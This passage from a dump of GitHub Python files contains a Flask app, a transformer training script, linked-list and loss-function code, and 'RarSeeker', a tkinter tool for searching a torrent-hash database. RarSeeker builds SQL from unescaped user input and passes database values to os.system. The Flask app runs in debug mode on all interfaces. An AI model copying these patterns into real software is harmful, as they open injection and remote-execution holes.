rlower=relativedelta(days=45),\n rupper=relativedelta(days=44),\n requisitions=None,\n requisitions_prn=requisitions_prn,\n crfs=crf_2001,\n crfs_prn=caregiver_crfs_prn,\n facility_name='5-day clinic')\n","repo_name":"flourishbhp/flourish-visit-schedule","sub_path":"flourish_visit_schedule/visit_schedules/schedules/caregiver/caregiver_visits/cohort_b_visits.py","file_name":"cohort_b_visits.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36837795247","text":"from flask import Flask, render_template\n\nfrom presets import PresetsAPI\n\napp = Flask(__name__)\npresets_view = PresetsAPI.as_view('presets')\napp.add_url_rule('/presets/', view_func= presets_view, methods = ['GET', 'POST'])\napp.add_url_rule('/presets/', view_func = presets_view, methods=['PUT', 'DELETE'])\n\n#Flask and Ajax returns\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"MaxHunt/barProject","sub_path":"app_sam.py","file_name":"app_sam.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73368313832","text":"import gzip\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport os.path\nfrom torch.utils.tensorboard import SummaryWriter\nfrom datasets.enwik8_dataset import Enwik8CharsDataset\n\nfrom transformer.models import AutoregressiveDecoder\n\nTRAIN_SIZE = 100000\nTEST_SIZE = 50000\nBATCH_SIZE = 20\nTRAIN_EPOCHS = 5\nLEARNING_RATE = 0.0001\nWARMUP_STEPS = 5000\nCONTEXT_LEN = 128\n\nMODEL_NAME = 'enwik8_char_large5'\n\nGEN_CHARS_AMOUNT = 1500\nTEMP = 0.0\n\ndef sample(probs, tempature=0.0):\n if tempature == 0.0:\n return probs.argmax()\n\n probs = F.softmax(probs / tempature, dim=0)\n dist = torch.distributions.Categorical(probs)\n\n return dist.sample()\n\ndef evaluate(model, dataset):\n test_dataloader = torch.utils.data.DataLoader(dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=Enwik8CharsDataset.collate)\n\n inputs, targets = next(iter(test_dataloader))\n\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n outputs = model(inputs)\n loss = loss_fn(outputs.transpose(2, 1), targets)\n\n return loss.item()\n\nif __name__ == '__main__':\n dataset = Enwik8CharsDataset(CONTEXT_LEN)\n train_dataset, test_dataset, _ = torch.utils.data.random_split(dataset, (10000000, 150000, len(dataset) - 10000000 - 150000))\n print(f'Train dataset size: {len(train_dataset)}, Test dataset size: {len(test_dataset)}')\n\n model = AutoregressiveDecoder(dim_embeddings=128, num_heads=12, num_layers=20, num_tokens=256, seq_length=CONTEXT_LEN)\n model.cuda()\n\n if os.path.isfile(f'models/{MODEL_NAME}.pt'):\n model.load_state_dict(torch.load(f'models/{MODEL_NAME}.pt'))\n print('Loaded model from disk')\n else:\n print('No model found, starting from scratch')\n\n board = SummaryWriter(f'runs/{MODEL_NAME}')\n\n optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE )\n optimizer.zero_grad()\n\n loss_fn = torch.nn.NLLLoss(reduction='mean')\n\n i = 0\n for _ in range(TRAIN_EPOCHS):\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=Enwik8CharsDataset.collate)\n\n for inputs, targets in train_dataloader:\n if WARMUP_STEPS > 0 and i < WARMUP_STEPS:\n lr = max((LEARNING_RATE / WARMUP_STEPS) * i, 1e-10)\n optimizer.lr = lr\n\n optimizer.zero_grad()\n\n inputs = inputs.cuda()\n targets = targets.cuda()\n\n outputs = model(inputs)\n loss = loss_fn(outputs.transpose(2, 1), targets)\n\n board.add_scalar('loss', loss.item(), i)\n\n loss.backward()\n optimizer.step()\n\n if i % 10 == 0:\n print(f'Iteration: {i}, Loss: {loss.item()}')\n\n if i % 100 == 0:\n validation_loss = evaluate(model, test_dataset)\n board.add_scalar('validation_loss', validation_loss, i)\n print(f'Iteration: {i}, Validation loss: {validation_loss}')\n\n torch.save(model.state_dict(), f'models/{MODEL_NAME}.pt')\n\n i += 1\n\n # model.eval()\n # input_seq = test_data[:CONTEXT_LEN - 15].long().cuda()\n\n # for char in input_seq:\n # print(str(chr(char)), end='')\n\n # for _ in range(GEN_CHARS_AMOUNT):\n # probs = model(input_seq[None, :])\n # next_char = sample(probs[0, -1, :], TEMP)\n\n # print(str(chr(max(32, next_char))), end='')\n\n # input_seq = torch.cat([input_seq[1:], next_char[None]], dim=0)\n ","repo_name":"jacobvm04/nlp-transformers","sub_path":"enwik8_chars.py","file_name":"enwik8_chars.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16871716881","text":"import sys\nfrom game import Game\n\n\ndef main():\n g = Game((10, 10), 0.5)\n try:\n\n size = int(sys.argv[1]), int(sys.argv[2])\n prob = float(sys.argv[3])\n g = Game(size, prob)\n except:\n print('Type instead: \\\" python shola.py 10 10 0.2 \\\"')\n exit()\n g.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"or-yanko/Python-Projects","sub_path":"pyGame/sholeHamokshim/shola.py","file_name":"shola.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71433723434","text":"import tkinter as tk\r\nfrom tkinter import ttk, filedialog, messagebox\r\nimport sqlite3\r\nimport os\r\nimport re\r\nimport configparser\r\n\r\n\r\nclass RarSeekerApp:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"RarSeeker\")\r\n self.root.grid_rowconfigure(1, weight=1)\r\n self.root.grid_columnconfigure(0, weight=1)\r\n\r\n # Carregue o caminho do banco de dados a partir do arquivo de configuração\r\n self.config = configparser.ConfigParser()\r\n self.config_file = \"rarseeker_config.ini\"\r\n self.db_path = None\r\n\r\n if os.path.isfile(self.config_file):\r\n self.config.read(self.config_file)\r\n if \"Settings\" in self.config:\r\n self.db_path = self.config[\"Settings\"].get(\"db_path\", None)\r\n\r\n # Campos de pesquisa no lado esquerdo\r\n search_frame = ttk.Frame(root)\r\n search_frame.grid(row=0, column=0, padx=5, pady=5, sticky=\"w\")\r\n\r\n # Adicione o dropdown para selecionar o campo de pesquisa\r\n self.search_field_label = ttk.Label(search_frame, text=\"Search by:\")\r\n self.search_field_label.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n self.search_field_var = tk.StringVar()\r\n self.search_field_var.set(\"name\") # Inicialmente definido como \"name\"\r\n\r\n self.name_search_radio = ttk.Radiobutton(search_frame, text=\"Name\", variable=self.search_field_var,\r\n value=\"name\")\r\n self.imdb_search_radio = ttk.Radiobutton(search_frame, text=\"IMDB Tag\", variable=self.search_field_var,\r\n value=\"imdb tag\")\r\n\r\n self.name_search_radio.grid(row=0, column=1, padx=5, pady=5)\r\n self.imdb_search_radio.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n #self.name_label = ttk.Label(search_frame, text=\"Name:\")\r\n self.name_field = ttk.Entry(search_frame, width=40)\r\n self.name_field.bind('', lambda event=None: self.search_db())\r\n self.search_button = ttk.Button(search_frame, text=\"Search\", command=self.search_db)\r\n\r\n #self.name_label.grid(row=0, column=2, padx=5, pady=5)\r\n self.name_field.grid(row=0, column=3, padx=5, pady=5)\r\n self.search_button.grid(row=0, column=4, padx=5, pady=5)\r\n\r\n\r\n\r\n self.category_label = ttk.Label(search_frame, text=\"Category:\")\r\n self.category_label.grid(row=0, column=5, padx=5, pady=5)\r\n\r\n self.category_combo = ttk.Combobox(search_frame,\r\n values=[\"All\", \"ebooks\", \"games_pc_iso\", \"games_pc_rip\", \"games_ps3\",\r\n \"games_ps4\", \"games_xbox360\", \"movies\", \"movies_bd_full\",\r\n \"movies_bd_remux\", \"movies_x264\", \"movies_x264_3d\",\r\n \"movies_x264_4k\", \"movies_x264_720\", \"movies_x265\",\r\n \"movies_x265_4k\", \"movies_x265_4k_hdr\", \"movies_xvid\",\r\n \"movies_xvid_720\", \"music_flac\", \"music_mp3\",\r\n \"software_pc_iso\", \"tv\", \"tv_sd\", \"tv_uhd\", \"xxx\"])\r\n self.category_combo.set(\"All\")\r\n self.category_combo.grid(row=0, column=6, padx=5, pady=5)\r\n self.column_widths = [220, 560, 50, 55, 2, 3, 4]\r\n # Área de exibição dos resultados\r\n self.treeview = ttk.Treeview(root, columns=(\r\n \"Hash\", \"Title\", \"DT\", \"Category\", \"Size\", \"Resolution\", \"IMDB Tag\"), show=\"headings\")\r\n # self.treeview.heading(\"ID\", text=\"ID\")\r\n self.treeview.heading(\"Hash\", text=\"Hash\", command=lambda: self.treeview_sort_column(\"Hash\", False))\r\n self.treeview.heading(\"Title\", text=\"Title\", command=lambda: self.treeview_sort_column(\"Title\", False))\r\n self.treeview.heading(\"DT\", text=\"Date\", command=lambda: self.treeview_sort_column(\"DT\", False))\r\n self.treeview.heading(\"Category\", text=\"Category\", command=lambda: self.treeview_sort_column(\"Category\", False))\r\n self.treeview.heading(\"Size\", text=\"Size\", command=lambda: self.treeview_sort_size())\r\n self.treeview.heading(\"Resolution\", text=\"Resolution\", command=lambda: self.treeview_sort_resolution())\r\n self.treeview.heading(\"IMDB Tag\", text=\"IMDB Tag\", command=lambda: self.treeview_sort_column(\"IMDB Tag\", False))\r\n self.treeview.grid(row=1, column=0, columnspan=5, padx=5, pady=5, sticky=\"nsew\")\r\n\r\n self.treeview.bind(\"\", lambda event: None)\r\n self.treeview.bind(\"\", self.show_context_menu)\r\n\r\n self.scrollbar = ttk.Scrollbar(root, orient=\"vertical\", command=self.treeview.yview)\r\n self.scrollbar.grid(row=1, column=5, padx=5, pady=5, sticky=\"ns\")\r\n self.treeview.configure(yscrollcommand=self.scrollbar.set)\r\n for i, col in enumerate(self.treeview[\"columns\"]):\r\n self.treeview.column(col, width=self.column_widths[i])\r\n self.search_count_label = ttk.Label(root, text=\"Records Found: 0\")\r\n self.search_count_label.grid(row=2, column=0, padx=5, pady=5, sticky=\"w\")\r\n\r\n # Botão de conexão e carregamento do banco de dados\r\n button_frame = ttk.Frame(root)\r\n button_frame.grid(row=2, column=0, columnspan=5, padx=5, pady=5)\r\n\r\n self.connect_load_button = ttk.Button(button_frame, text=\"Connect & Load DB\", command=self.connect_and_load_db)\r\n self.connect_load_button.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n self.resolution_filter_label = ttk.Label(button_frame, text=\"Resolution Filter:\")\r\n self.resolution_filter_label.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n self.resolution_combo = ttk.Combobox(button_frame, values=[\"All\"])\r\n self.resolution_combo.set(\"All\")\r\n self.resolution_combo.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n self.sort_column = None\r\n self.sort_descending = False\r\n # Bloquear os campos de pesquisa antes da conexão com o banco de dados\r\n self.resolution_combo.config(state=\"disabled\")\r\n self.name_field.config(state=\"disabled\")\r\n self.category_combo.config(state=\"disabled\")\r\n self.search_button.config(state=\"disabled\")\r\n self.name_search_radio.config(state=\"disabled\")\r\n self.imdb_search_radio.config(state=\"disabled\")\r\n self.resolution_combo.bind(\"<>\", self.update_resolution_filter)\r\n\r\n self.db_file = None\r\n self.db_connection = None\r\n self.current_db = None\r\n\r\n def save_config(self):\r\n if self.db_path:\r\n if not os.path.isfile(self.config_file):\r\n open(self.config_file, 'w').close() # Crie o arquivo de configuração se ele não existir\r\n\r\n self.config[\"Settings\"] = {\"db_path\": self.db_path}\r\n with open(self.config_file, 'w') as configfile:\r\n self.config.write(configfile)\r\n\r\n def connect_and_load_db(self):\r\n if self.db_path and not os.path.exists(self.db_path):\r\n self.db_path = None # Define o caminho do banco de dados como None para permitir ao usuário selecionar um novo\r\n self.save_config()\r\n\r\n if not self.db_path:\r\n db_path = filedialog.askopenfilename(filetypes=[(\"SQLite Database\", \"*.sqlite\")])\r\n if db_path:\r\n self.db_path = db_path\r\n self.save_config()\r\n else:\r\n return\r\n\r\n if not os.path.exists(self.db_path):\r\n messagebox.showerror(\"Error\", \"Database not found at the specified path.\")\r\n return\r\n\r\n self.db_connection = sqlite3.connect(self.db_path)\r\n # Habilitar os campos após a conexão com o banco de dados\r\n self.name_field.config(state=\"normal\")\r\n self.category_combo.config(state=\"normal\")\r\n self.search_button.config(state=\"normal\")\r\n self.name_search_radio.config(state=\"normal\")\r\n self.imdb_search_radio.config(state=\"normal\")\r\n self.resolution_combo[\"state\"] = \"readonly\" # Definir como \"readonly\"\r\n self.category_combo[\"state\"] = \"readonly\" # Definir como \"readonly\"\r\n self.current_db = self.db_path\r\n self.connect_load_button.config(state=\"disabled\")\r\n\r\n def load_db(self):\r\n if not self.current_db:\r\n return\r\n search_input = self.name_field.get()\r\n selected_category = self.category_combo.get()\r\n search_field = self.search_field_var.get()\r\n\r\n # Dividir a entrada do usuário em palavras individuais\r\n search_words = search_input.split()\r\n\r\n # Combine as palavras usando '%' para criar um único critério \"LIKE\"\r\n search_query = '%' + '%'.join(search_words) + '%'\r\n\r\n # Construa a consulta SQL\r\n if search_field == \"name\": # Verifique o campo selecionado\r\n query = f\"SELECT * FROM items WHERE title LIKE '{search_query}'\"\r\n elif search_field == \"imdb tag\":\r\n query = f\"SELECT * FROM items WHERE imdb = '{search_input}'\"\r\n\r\n if selected_category != \"All\":\r\n query += f\" AND cat = '{selected_category}'\"\r\n\r\n cursor = self.db_connection.cursor()\r\n cursor.execute(query)\r\n rows = cursor.fetchall() # Buscar todos os resultados, sem limite\r\n\r\n self.treeview.delete(*self.treeview.get_children())\r\n\r\n for row in rows:\r\n id, hash, title, dt, cat, size, ext_id, imdb = row\r\n resolution = self.extract_resolution(title)\r\n size_str = self.format_size(size)\r\n imdb = \"\" if imdb is None else imdb\r\n self.treeview.insert(\"\", \"end\", values=(hash, title, dt, cat, size_str, resolution, imdb))\r\n\r\n distinct_resolutions = self.get_distinct_resolutions(rows)\r\n self.resolution_combo[\"values\"] = [\"All\"] + distinct_resolutions\r\n\r\n # Atualize a contagem e exiba-a\r\n self.search_count = len(rows)\r\n self.update_search_count_label()\r\n\r\n def treeview_sort_column(self, col, descending):\r\n data = [(self.treeview.set(child, col), child) for child in self.treeview.get_children('')]\r\n data.sort(reverse=descending)\r\n for i, item in enumerate(data):\r\n self.treeview.move(item[1], '', i)\r\n self.treeview.heading(col, command=lambda: self.treeview_sort_column(col, not descending))\r\n\r\n def treeview_sort_resolution(self):\r\n items = [(self.treeview.set(child, \"Resolution\"), child) for child in self.treeview.get_children('')]\r\n items.sort(key=lambda x: int(re.search(r'\\d+', x[0]).group()) if re.search(r'\\d+', x[0]) else 0,\r\n reverse=self.sort_descending)\r\n for i, (val, child) in enumerate(items):\r\n self.treeview.move(child, '', i)\r\n self.sort_descending = not self.sort_descending\r\n\r\n def treeview_sort_size(self):\r\n items = [(self.treeview.set(child, \"Size\"), child) for child in self.treeview.get_children('')]\r\n sizes = {\"KB\": 1024, \"MB\": 1024 ** 2, \"GB\": 1024 ** 3, \"TB\": 1024 ** 4, \"PB\": 1024 ** 5, \"EB\": 1024 ** 6}\r\n\r\n # Modificação para evitar a conversão de 'N/A' em float\r\n def get_size_key(x):\r\n size_str = x[0]\r\n size_parts = size_str.split()\r\n if len(size_parts) == 2:\r\n size_value, size_unit = size_parts\r\n return float(size_value) * sizes.get(size_unit, -1)\r\n else:\r\n return -1 # Retorna -1 para 'N/A' ou tamanhos inválidos\r\n\r\n items.sort(key=get_size_key, reverse=self.sort_descending)\r\n\r\n for i, (val, child) in enumerate(items):\r\n self.treeview.move(child, '', i)\r\n self.sort_descending = not self.sort_descending\r\n\r\n def update_search_count_label(self):\r\n self.search_count_label.config(text=f\"Records Found: {self.search_count}\")\r\n\r\n def resize_columns(self):\r\n # Redimensionar colunas de acordo com as larguras atuais da Treeview\r\n for i, col in enumerate(self.treeview[\"columns\"]):\r\n self.column_widths[i] = self.treeview.column(col, option=\"width\")\r\n\r\n def show_context_menu(self, event):\r\n item = self.treeview.identify(\"item\", event.x, event.y)\r\n if item:\r\n self.treeview.selection_set(item) # Seleciona o item clicado com o botão direito\r\n menu = tk.Menu(self.root, tearoff=0)\r\n menu.add_command(label=\"Copy HASH\", command=lambda: self.copy_hash(item))\r\n menu.add_command(label=\"Copy Name\", command=lambda: self.copy_name(item))\r\n menu.add_command(label=\"Copy IMDB Tag\", command=lambda: self.copy_imdb_tag(item))\r\n menu.add_command(label=\"Copy Magnet Link\",\r\n command=lambda: self.copy_magnet_link(item)) # Adicione esta linha\r\n menu.add_command(label=\"Open in QBitTorrent\", command=lambda: self.open_in_qbittorrent(item))\r\n menu.post(event.x_root, event.y_root)\r\n\r\n def copy_imdb_tag(self, item):\r\n content = self.treeview.item(item, \"values\")[6] # Get the value of the \"IMDB Tag\" column\r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(content)\r\n self.root.update()\r\n\r\n def copy_hash(self, item):\r\n content = self.treeview.item(item, \"values\")[0] # Get the value of the Hash column\r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(content)\r\n self.root.update() # This is necessary for it to work on some systems\r\n\r\n def copy_name(self, item):\r\n content = self.treeview.item(item, \"values\")[1] # Get the value of the Title column\r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(content)\r\n self.root.update()\r\n\r\n def copy_magnet_link(self, item):\r\n torrent_hash = self.treeview.item(item, \"values\")[0] # Get the value of the Hash column\r\n if torrent_hash:\r\n magnet_link = f\"magnet:?xt=urn:btih:{torrent_hash}\"\r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(magnet_link)\r\n self.root.update()\r\n\r\n def format_size(self, size):\r\n if size is None:\r\n return \"N/A\"\r\n if size < 1024:\r\n return f\"{int(size)} bytes\" # Remove as casas decimais\r\n elif size < 1024 ** 2:\r\n return f\"{int(size / 1024)} KB\" # Remove as casas decimais\r\n elif size < 1024 ** 3:\r\n return f\"{int(size / (1024 ** 2))} MB\" # Remove as casas decimais\r\n elif size < 1024 ** 4:\r\n return f\"{size / (1024 ** 3):.2f} GB\"\r\n elif size < 1024 ** 5:\r\n return f\"{size / (1024 ** 4):.2f} TB\"\r\n else:\r\n return \"Too big\"\r\n\r\n def extract_resolution(self, title):\r\n resolution_pattern = re.compile(r\"(\\d{3,4}p)\")\r\n match = resolution_pattern.search(title)\r\n if match:\r\n return match.group(0)\r\n return \"\"\r\n\r\n def get_distinct_resolutions(self, rows):\r\n resolutions = set()\r\n for row in rows:\r\n title = row[2]\r\n resolution = self.extract_resolution(title)\r\n if resolution:\r\n resolutions.add(resolution)\r\n\r\n # Extrair e classificar apenas os números da resolução\r\n resolutions = sorted(list(resolutions),\r\n key=lambda x: int(re.search(r'\\d+', x).group()) if re.search(r'\\d+', x) else 0,\r\n reverse=True)\r\n\r\n return resolutions\r\n\r\n def search_db(self):\r\n if self.db_connection:\r\n # Verificar se o usuário digitou algo antes de realizar a pesquisa\r\n search_input = self.name_field.get().strip()\r\n if not search_input:\r\n messagebox.showinfo(\"Empty Search\", \"Please enter a search query.\")\r\n return\r\n\r\n self.load_db()\r\n self.update_search_count_label()\r\n\r\n # Verifique se nenhum resultado foi encontrado\r\n if self.search_count == 0:\r\n messagebox.showinfo(\"No Results\", \"No results found for the given search criteria.\")\r\n\r\n # Restaure o filtro de resolução para \"All\" após cada pesquisa\r\n self.resolution_combo.set(\"All\")\r\n else:\r\n messagebox.showerror(\"Error\", \"Database not connected.\")\r\n\r\n def open_in_qbittorrent(self, event):\r\n selected_item = self.treeview.selection()\r\n if selected_item:\r\n torrent_hash = self.treeview.item(selected_item, \"values\")[0] # Get the value of the Hash column\r\n if torrent_hash:\r\n qbittorrent_path = \"C:/Program Files/qBittorrent/qbittorrent.exe\"\r\n os.system(f'\"{qbittorrent_path}\" {torrent_hash}')\r\n\r\n def update_resolution_filter(self, event=None):\r\n selected_resolution = self.resolution_combo.get()\r\n search_input = self.name_field.get()\r\n search_field = self.search_field_var.get()\r\n search_words = search_input.split()\r\n selected_category = self.category_combo.get()\r\n\r\n if selected_resolution == \"All\":\r\n # Defina a cláusula de filtro de resolução vazia para carregar todos os resultados\r\n resolution_query = \"\"\r\n else:\r\n resolution_query = f\"AND title LIKE '%{selected_resolution}%'\"\r\n\r\n if selected_category != \"All\":\r\n cat_query = f\" AND cat = '{selected_category}'\"\r\n else:\r\n cat_query = \"\"\r\n\r\n # Construa a consulta SQL com base na cláusula de filtro de resolução\r\n if search_field == \"name\":\r\n search_query = '%' + '%'.join(search_words) + '%' # Construa o critério \"LIKE\" para o nome\r\n query = f\"SELECT * FROM items WHERE title LIKE '{search_query}' {resolution_query} {cat_query}\"\r\n elif search_field == \"imdb tag\":\r\n query = f\"SELECT * FROM items WHERE imdb = '{search_input}' {resolution_query} {cat_query}\"\r\n\r\n if self.db_connection:\r\n cursor = self.db_connection.cursor()\r\n cursor.execute(query)\r\n rows = cursor.fetchall()\r\n\r\n self.treeview.delete(*self.treeview.get_children())\r\n\r\n for row in rows:\r\n id, hash, title, dt, cat, size, ext_id, imdb = row\r\n resolution = self.extract_resolution(title)\r\n size_str = self.format_size(size)\r\n imdb = \"\" if imdb is None else imdb\r\n self.treeview.insert(\"\", \"end\", values=(hash, title, dt, cat, size_str, resolution, imdb))\r\n\r\n # Atualize a contagem e exiba-a\r\n self.search_count = len(rows)\r\n self.update_search_count_label()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n root.state('zoomed')\r\n app = RarSeekerApp(root)\r\n root.mainloop()\r\n","repo_name":"mop4r/RarSeeker","sub_path":"RarSeeker.py","file_name":"RarSeeker.py","file_ext":"py","file_size_in_byte":18860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8810160694","text":"'''\n● 문제: 1~K까지 약수의 개수를 출력하라.\n\n1) K까지의 수에 대해 1~i까지 다 나눠보는 방법\nO(K^2)\n: K이하의 수로 다 나눠보는것\n\n\n2) K까지의 수에 대해 약수를 이용 하는 방법\nO(K루트2 * K)\n: 약수를 이용하자. K의 가운데 약수까지 확인하면 뒤쪽은 안봐도 됨.\n-> 수가 커지면 모든 수를 검사하는 방법은 느릴 수 있다.\n\n\n3) 에라토스테네스의 체\n: 범위 K까지 알고리즘 적용한다. 이때 i(2<=i<=K)가 약수인지 판별할 때에는\nO(NloglogN)\n-> 행렬을 할당해야하므로 메모리 리스크가 있다.\n보통 N이 1_000_000이내로 주어지는 경우가 많음\n-> 이론상 400만 번 정도 연산으로 문제 해결 가능.\n\n'''\n\n# 문제: 1000이하의 수 중에서 소수는 몇 개인가?\n\nimport math \n\nn = 1000 \narray = [True] * (n+1) # 0~1000\n\n# 에라토스테네스의 체 알고리즘\narray[1] = False # 1은 소수 아님\nfor i in range(2, int(math.sqrt(n)) + 1): # 2~ n의 약수의 중간까지\n if array[i] == True: # i가 남은 수인 경우(소수인 경우)\n j = 2 \n while i*j <= n:\n array[i*j] = False\n j += 1\n\n# 모든 소수 출력\nfor i in range(2, n+1):\n if array[i]:\n print(i,end=' ')\n","repo_name":"Minsik113/Algorithm-practice","sub_path":"[책]이것이코딩테스트다/9_기타알고리즘/1_여러수의 소수판별.py","file_name":"1_여러수의 소수판별.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73446469034","text":"\n\n\n\n\n\n\n\n# # Singly-linked lists are already defined with this interface:\n# class ListNode(object):\n# def __init__(self, x):\n# self.value = x\n# self.next = None\n# self.head = None\n \n \n \n# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n def __init__(self, x):\n self.value = x\n self.next = None\n self.head = None\n \n def printList(self):\n temp = self.head\n snapit = []\n c= 0\n while (temp):\n # print(temp.value)\n snapit.append(temp.value)\n temp = temp.next\n c = c + 1\n return snapit\n\n# Node class\nclass Node:\n \n # Function to initialise the node object\n def __init__(self, data):\n self.data = data # Assign data\n self.next = None # Initialize next as null\n \n \n# Linked List class contains a Node object\nclass LinkedList:\n \n # Function to initialize head\n def __init__(self):\n self.head = None\n \n \n # Functio to insert a new node at the beginning\n def push(self, new_data):\n \n # 1 & 2: Allocate the Node &\n # Put in the data\n new_node = Node(new_data)\n \n # 3. Make next of new Node as head\n new_node.next = self.head\n \n # 4. Move the head to point to new Node\n self.head = new_node\n \n \n # This function is in LinkedList class. Inserts a\n # new node after the given prev_node. This method is\n # defined inside LinkedList class shown above */\n def insertAfter(self, prev_node, new_data):\n \n # 1. check if the given prev_node exists\n if prev_node is None:\n print(\"The given previous node must inLinkedList.\")\n return\n \n # 2. create new node &\n # Put in the data\n new_node = Node(new_data)\n \n # 4. Make next of new Node as next of prev_node\n new_node.next = prev_node.next\n \n # 5. make next of prev_node as new_node\n prev_node.next = new_node\n \n \n # This function is defined in Linked List class\n # Appends a new node at the end. This method is\n # defined inside LinkedList class shown above */\n def append(self, new_data):\n \n # 1. Create a new node\n # 2. Put in the data\n # 3. Set next as None\n new_node = Node(new_data)\n \n # 4. If the Linked List is empty, then make the\n # new node as head\n if self.head is None:\n self.head = new_node\n return\n \n # 5. Else traverse till the last node\n last = self.head\n while (last.next):\n last = last.next\n \n # 6. Change the next of last node\n last.next = new_node\n \n \n # Utility function to print the linked list\n def printList(self):\n temp = self.head\n snapit = []\n c= 0\n while (temp):\n print(temp.data)\n snapit.append(temp.data)\n temp = temp.next\n c = c + 1\n return snapit\n \ndef reverseLinkedList(l):\n \n ll = ListNode(l)\n l2 = ListNode(l)\n ll.head = l\n l2.head = l\n eq = []\n eq = ll.printList()\n eqld = []\n for iia in eq[::-1]:\n eqld.append(iia)\n return eqld\n","repo_name":"extrude575757/Python_Datastructures","sub_path":"sprintLnkNdQueStackRecursion.py","file_name":"sprintLnkNdQueStackRecursion.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71717122794","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.modules.loss import _WeightedLoss\nimport torch.nn.functional as F\n\nclass MyLoss1(nn.CrossEntropyLoss):\n def __init__(self, weights=None):\n super(MyLoss1, self).__init__()\n self.celoss = torch.nn.CrossEntropyLoss(weight=weights)\n def forward(self, output, label):\n label = label.long()\n return self.celoss(output, label)\n\n\n\nclass LabelSmoothCrossEntropyLoss(_WeightedLoss):\n def __init__(self, weight=None, reduction='mean', smoothing=0.15):\n super().__init__(weight=weight, reduction=reduction)\n self.smoothing = smoothing\n self.weight = weight\n self.reduction = reduction\n @staticmethod\n def _smooth_one_hot(targets: torch.Tensor, n_classes: int, smoothing=0.0):\n assert 0 <= smoothing < 1\n with torch.no_grad():\n targets = torch.empty(size=(targets.size(0), n_classes),\n device=targets.device) \\\n .fill_(smoothing / (n_classes - 1)) \\\n .scatter_(1, targets.data.unsqueeze(1), 1. - smoothing)\n return targets\n def forward(self, inputs, targets):\n targets = LabelSmoothCrossEntropyLoss._smooth_one_hot(targets, inputs.size(-1),\n self.smoothing)\n lsm = F.log_softmax(inputs, -1)\n if self.weight is not None:\n lsm = lsm * self.weight.unsqueeze(0)\n loss = -(targets * lsm).sum(-1)\n \n if self.reduction == 'sum':\n loss = loss.sum()\n\n elif self.reduction == 'mean':\n loss = loss.mean()\n return loss\n\nclass SmoothCrossEntropyLoss(_WeightedLoss):\n def __init__(self, weight=None, reduction='mean', smoothing=0.1):\n super().__init__(weight=weight, reduction=reduction)\n self.smoothing = smoothing\n self.weight = weight\n self.reduction = reduction\n\n def k_one_hot(self, targets:torch.Tensor, n_classes:int, smoothing=0.0):\n with torch.no_grad():\n targets = torch.empty(size=(targets.size(0), n_classes),\n device=targets.device) \\\n .fill_(smoothing /(n_classes-1)) \\\n .scatter_(1, targets.data.unsqueeze(1), 1.-smoothing)\n return targets\n\n def reduce_loss(self, loss):\n return loss.mean() if self.reduction == 'mean' else loss.sum() \\\n if self.reduction == 'sum' else loss\n\n def forward(self, inputs, targets):\n assert 0 <= self.smoothing < 1\n\n targets = self.k_one_hot(targets, inputs.size(-1), self.smoothing)\n log_preds = F.log_softmax(inputs, -1)\n\n if self.weight is not None:\n log_preds = log_preds * self.weight.unsqueeze(0)\n\n return self.reduce_loss(-(targets * log_preds).sum(dim=-1))\n\n\nclass MyLoss2(LabelSmoothCrossEntropyLoss):\n def __init__(self, weights = None):\n super(MyLoss2, self).__init__()\n self.weights = weights\n\n def forward(self, output, label):\n celoss = LabelSmoothCrossEntropyLoss(weight = self.weights, reduction='mean')\n loss = celoss(output, label)\n return loss\n\nif __name__ == '__main__':\n nSamples = [887, 6130, 480, 317, 972, 101, 128]\n normedWeights = [1 - (x / sum(nSamples)) for x in nSamples]\n normedWeights = torch.FloatTensor(normedWeights)\n print(normedWeights)\n","repo_name":"youngjun0627/image_classification","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32521539610","text":"#MDS - multi dimensional scaling\n#dries.wijns[@]gmail.com\nimport math\nimport random\nimport copy\n\n\"\"\"\n import pylab as p\n \n def testSimple():\n distanceMatrix = list( [[0,1,1,1],\n [4,0,1,1],\n [1,9,0,1],\n [3,1,1,0]] )\n points = MDS(distanceMatrix).points()\n plot(points)\n exit()\n \n def plot(points):\n x = [point[0] for point in points]\n y = [point[1] for point in points]\n \n p.plot(x,y, 'ro')\n p.show()\n \"\"\" \n\nclass MDS():\n \"\"\"Multi-dimensional scaling:\n \n input: 